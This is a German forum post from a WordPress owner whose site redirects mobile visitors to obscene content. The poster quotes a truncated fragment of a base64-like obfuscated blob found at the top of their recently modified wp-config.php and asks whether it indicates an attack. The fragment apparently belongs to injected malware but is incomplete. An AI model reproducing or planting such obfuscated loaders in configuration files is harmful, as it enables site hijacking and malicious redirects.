Hallo zusammen.
Irgendwas stimmt auf meiner Wordpress Instalation nicht. Über mobile Geräte leitet die Eingabe der Domain auf obszön Inhalte weiter. Nun forsche ich auf dem Server, was los ist... Die wp-config.php wurde vor wenigen Tage zuletzt bearbeitet und sieht für mein Leien Auge sehr komisch aus... Wie fängt diese denn für gewöhnlich an?
Meine beginnt mit:
<?php function
Nun kommen bestimmt 20 Zeilen mit "Buchstaben/ZahlenWirrwarr". Hier ein kleiner Teil mittig rauskopiert: (...)xOTW1jeFYwUktiMkpHYkZoVmJYaHFZa1JDZDFOVlRscGlWV3hKVVc1c1lWWXlVbTFaYkdSSFRVWnJlVm95T1VwaFZHeHNVekJhZW1WRmVGVmlSMUp0VW01T05GUkdVbk5hUm1RMlVWaFNVRlpxUlRSVVZscDZaREI0VldKSFVsaGxhMFl3VkRGWmVFOUZNWE5qTTJSTlZrWkthMVl6Y0VKa1JUbFhUVlJvVG1Gc1dtbFVWVTEzVFZab1ZHRXlPVmxSZWxKMlZqTndRbVJGT1ZkTSV1dWZElaRFJXTTNCQ1pFVTVWMDFYU2s1UmVrRXhWMFpvTTJWV1pEWlJXRkpQVW1wR2FWUlZUWGRPVm1oWlpETnNUdKRVpFNU5la0p5VkVoc1NtTXdiRVJWYlZwV1RVWmFWRlp0ZEZkVk1XUTFWVzVrYW1KVWF6QmFWbGsxWWpGd1dGSnRkR0ZYUlhCclV6Rk9jMDR5VG5SV2FrSnJWMFZ3TVZOVlRsTmFiRl (....)
Irgendwann kommt dann:
/**
* In dieser Datei werden die Grundeinstellungen für WordPress vorgenommen.
*
* Zu diesen Einstellungen gehören: MySQL-Zugangsdaten, Tabellenpräfix (.....)
ich vermute, ab hier kommt der Standard.
Kann mir jemand sagen, ob das normal ist, oder ob es auf einen Angriff hinweist?